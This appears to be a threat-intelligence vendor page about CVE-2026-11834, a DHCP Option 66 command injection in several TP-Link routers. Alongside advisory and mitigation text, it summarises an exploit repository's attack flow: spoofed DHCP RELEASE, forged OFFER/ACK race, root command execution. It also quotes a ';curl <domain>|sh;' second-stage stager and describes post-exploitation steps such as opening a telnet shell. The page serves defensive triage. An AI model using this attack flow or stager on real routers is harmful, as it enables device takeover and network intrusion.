CVE-2026-11834 is a command injection vulnerability affecting multiple TP-Link router models, including Archer C20, Archer MR200, and TL-MR6400. The flaw resides in DHCP option processing logic and is caused by insufficient validation of externally supplied DHCP option data. An attacker on the adjacent network can exploit the issue by sending crafted DHCP responses to a vulnerable device, causing unauthorized command execution during device initialization or provisioning workflows. The issue is particularly relevant when the router is in a factory-default or otherwise unconfigured state. Successful exploitation can result in arbitrary command execution with elevated privileges on the device.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos.
This repository is a small, focused exploit PoC consisting of one Python exploit script and a README. The exploit targets CVE-2026-11834, a TP-Link router command injection flaw in DHCP Option 66 handling. The Python script uses Scapy to perform a DHCP race attack on the local network: it first spoofs a DHCP RELEASE as the victim to invalidate the victim's lease on the legitimate DHCP server, then sniffs for the victim's DHCP DISCOVER/REQUEST traffic, and finally sends a malicious DHCP OFFER/ACK containing attacker-controlled Option 66 data. Because the vulnerable firmware concatenates Option 66 into a shell command and executes it via system(), the supplied payload runs as root. Repository structure is straightforward: README.md explains the vulnerability, attack flow, usage, and an example second-stage payload; cve-2026-11834.py is the sole exploit implementation and main entry point. The script accepts target IP, interface, legitimate DHCP server IP/MAC, optional target MAC and attacker IP, and a required payload limited to 16 characters due to target-side truncation. It auto-resolves the target MAC via ARP if needed, defaults the gateway to the legitimate DHCP server IP, and defaults DNS to 8.8.8.8. Main exploit capabilities: spoofing DHCP RELEASE packets, sniffing DHCP traffic, racing the legitimate DHCP server with forged OFFER/ACK responses, and delivering a root-level command injection stager through DHCP Option 66. The exploit is operational rather than a mere PoC because it includes a working delivery mechanism and supports arbitrary short payloads, though payload customization is constrained by the 16-character limit and typically relies on a second-stage HTTP fetch such as ';curl <domain>|sh;'. The README's example second stage demonstrates post-exploitation actions including flushing firewall rules and exposing a telnet shell on port 2323.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.